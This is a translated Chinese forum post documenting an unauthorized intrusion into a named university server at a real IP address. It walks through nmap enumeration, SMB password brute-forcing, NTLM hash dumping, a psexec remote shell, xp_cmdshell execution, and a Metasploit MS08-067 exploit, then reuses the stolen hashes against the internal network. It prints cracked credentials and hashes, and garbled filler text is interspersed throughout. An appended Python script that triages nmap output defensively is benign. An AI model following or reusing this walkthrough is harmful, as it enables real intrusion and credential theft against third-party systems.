nmap+msf intrusion of Guangxi Normal University

Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
% e6 f- n! V! F. r  F
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
5 y  G% m' @% v" X
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241   // use the script to enumerate the account names that exist on the remote machine
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   // scan result
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
5 x) G' i5 H: W" V* n
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241   // list the shares
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
- m4 ^/ N& N5 L0 J5 ?: K0 Y" f8 E1 \6 ?9 {, C" d1 L
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241   // obtain user passwords
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
2 U3 h9 r  Y1 c" q
. K" M: N- r0 W% f  eroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
/ `) Z1 F, ?0 d" _- A7 z; F- p3 x* t$ s( Q6 m
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data* d( X: T! Q2 }$ {9 p

2 G3 ?3 e" Q0 s: H& r! D0 N" droot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse3 ~' L  c2 s# }: u
& x& k1 i9 X5 o. b) C
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139( q2 z; ?) x7 P4 @+ B  m

6 e" U) s+ s/ R$ S2 h% ]Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST( b0 g0 x9 `1 N; }" B

' p- k' f$ H8 j# ^( I3 x" WNmap scan report for bogon (202.103.242.241)- D+ L- h3 p6 a8 k7 [  K. m. G
/ e; T7 {- G3 L& E/ Y9 ~
Host is up (0.0012s latency).
. n3 q) _  u% \5 ~. D& S& k! j- j$ B
PORT    STATE SERVICE$ e2 _- l- a2 K- a

% P; s+ C* Z, Q; O& W6 _135/tcp open  msrpc0 w( R9 J8 c% u

, ^4 P  }$ v. T! ]139/tcp open  netbios-ssn3 T. @! |6 C6 r6 a. t' y, I

- C* Y- t  V, Y5 P& p( D2 O445/tcp open  microsoft-ds6 r( p0 j/ z  S1 F, b* W

3 x# B+ P4 J, U6 }1 ]% aMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)$ T: x0 S+ Q6 G# F) w

$ K4 P3 e2 S( j8 d; M8 THost script results:% |1 c1 J, I8 i: k- X& ?

3 l- n% v- i7 K5 E- c| smb-pwdump:8 r) Z1 K9 Z! l' n( R' c

( g- f% U+ k7 ~" p9 e- I$ @| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************. y' j# Y- f* S  D

) C1 |# U, F4 x2 t| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************/ f& R& d7 z9 n; e! L* q

3 @  p0 O; U6 s| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4. n' U! K9 M6 |, C

+ W  C8 N& K( j% `- E, P|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
1 A) `- J. ?. ]" x. ^. b" y0 D2 L/ k4 e  u9 L, k
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds+ R* h) {9 J# d7 o
* V# |+ h; B- B5 l& e3 r
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell
PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig
Windows 2000 IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "   // log in remotely as sa and execute a command
1 T5 a* |8 `" @; V4 L3 a/ p; M5 p: F
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole   // exploit the MS08-067 vulnerability against the target machine from msf
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

0 i9 B" t! y( a, J9 s1 Sroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt
/ p' X2 h0 P3 I+ N5 L
' I* Z8 c2 u/ `0 s3 Q( Ntest
2 M& T- S+ P& ]: Y- R
( ]; S' J- L) ?* Q7 h. Jadministrator
  x9 m1 @7 b4 }7 X; N7 p0 [2 m8 }" i  N6 c
root@bt:/usr/local/share/nmap/scripts# vim password.txt9 a3 p# D- ?( o/ d: E

( g" t* P2 m( }44EFCE164AB921CAAAD3B435B51404EE8 F* g7 F4 v5 Z0 M4 v( ~5 P

/ d) p3 S7 i2 [0 B4 }root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
$ l& k* A. f  W/ l' S1 K3 P& ~3 m8 j% H* I
//利用用户名跟获取的hash尝试对整段内网进行登录9 @6 f4 y& z* A

4 z: g4 z% w- k/ a( o% n: yNmap scan report for 192.168.1.105' n( N* M% [3 ~2 j& {, z

8 e2 T' k7 U9 p5 U  uHost is up (0.00088s latency).
2 r/ e8 j0 L& U& I2 {2 q6 r. R
: B* A! s2 s5 \  q" FNot shown: 993 closed ports
/ z$ O& Z3 n; {* A8 |: W' P& t) d1 Z) a. u% j. \1 L- K2 p2 k; V' j
PORT     STATE SERVICE
+ W" K% Y4 d! |& @; _3 s; y. s9 v  m' R* Z4 w
135/tcp  open  msrpc% h* Z2 e* @1 `/ u) v% x5 b

0 a: Q- K& h: W+ D1 m139/tcp  open  netbios-ssn" P1 f1 }: E! H2 K  n% L% R

' k% C" e. u; E- _6 m) Q3 Z' t445/tcp  open  microsoft-ds0 V( Y8 w6 D# F" W

  p# D8 r5 Y- \. Y9 G% X& q1025/tcp open  NFS-or-IIS
" L$ Q) x8 _  b4 `! ^+ r! K# j/ s5 F: M/ S( R
1026/tcp open  LSA-or-nterm
# c. D8 T$ }, p) z
7 u5 O5 F- W$ I2 r3372/tcp open  msdtc" q3 C* O+ \, \

0 O- K4 t3 f$ y3 g7 E. v4 ^3389/tcp open  ms-term-serv  L5 q# v& V2 @' g+ J2 ~' f" V

' p' @" K3 ^) N- P5 l' X4 {MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
' M5 T4 q1 L. J% f; J( `: w
8 ^* e+ K$ P  g( t- Q& i  tHost script results:
+ A2 m. n( j, }# x" {( ]8 R' ^2 |/ @1 e6 z
| smb-brute:
  e0 o3 m9 w+ g5 U9 y
1 W! Z5 ^& t- o( v$ d  @|_  administrator:<blank> => Login was successful4 ^, j$ J# x2 ]& a8 k/ i9 G- `" A

4 @7 E& w) k' a攻击成功,一个简单的msf+nmap攻击~~·% i% h1 h' j. V% b5 u; ^
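As an added example that is not part of the post, the following Python script reads nmap normal output in the layout shown above and turns the smb-enum-shares, smb-brute and smb-check-vulns host script results into ranked findings, the kind of triage an administrator would run over their own scan of a host before an attacker does; the sample output, host name and address it embeds are constructed, not taken from the post.

```python
import re
from dataclasses import dataclass

# Constructed sample in the layout of the nmap "Host script results" blocks
# shown in the post; the host name and address here are made up.
SAMPLE_OUTPUT = """\
Nmap scan report for host-a (192.0.2.10)
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

@dataclass
class Finding:
    host: str
    severity: str
    detail: str

HOST_RE = re.compile(r"^Nmap scan report for .*?\(?(\d+\.\d+\.\d+\.\d+)\)?$")
SCRIPT_RE = re.compile(r"^\|\s*(smb-[\w-]+):$")
BRUTE_RE = re.compile(r"^\|_?\s+(\S+):(\S+) => Login was successful$")
SHARE_RE = re.compile(r"^\|\s{3}(\S+)$")
ANON_RE = re.compile(r"^\|_?\s+Anonymous access: (\S+)$")
VULN_RE = re.compile(r"^\|_?\s+(MS\d{2}-\d{3}): VULNERABLE$")

def triage(text):
    """Walk nmap normal output and turn SMB script results into findings."""
    findings, host, script, share = [], "?", None, None
    for line in text.splitlines():
        if m := HOST_RE.match(line):            # a new host block resets the state
            host, script = m.group(1), None
        elif m := SCRIPT_RE.match(line):        # "| smb-xxx:" opens a script block
            script = m.group(1)
        elif script == "smb-brute" and (m := BRUTE_RE.match(line)):
            user, pw = m.groups()
            blank = pw == "<blank>"             # a blank password is worse than a guessed one
            findings.append(Finding(host, "critical" if blank else "high",
                f"SMB login as {user} with {'blank' if blank else 'guessable'} password"))
        elif script == "smb-enum-shares" and (m := SHARE_RE.match(line)):
            share = m.group(1)                  # remember which share the next line describes
        elif script == "smb-enum-shares" and (m := ANON_RE.match(line)):
            if m.group(1) != "<none>":
                findings.append(Finding(host, "medium", f"share {share} allows anonymous {m.group(1)}"))
        elif script == "smb-check-vulns" and (m := VULN_RE.match(line)):
            findings.append(Finding(host, "critical", f"{m.group(1)} unpatched"))
    return findings
```

Run over a multi-host scan, it yields one finding per risky line, keyed by host, so blank administrator passwords and unpatched hosts can be fixed first.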

" P5 f* b/ p; ?4 a% t7 n" N; P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表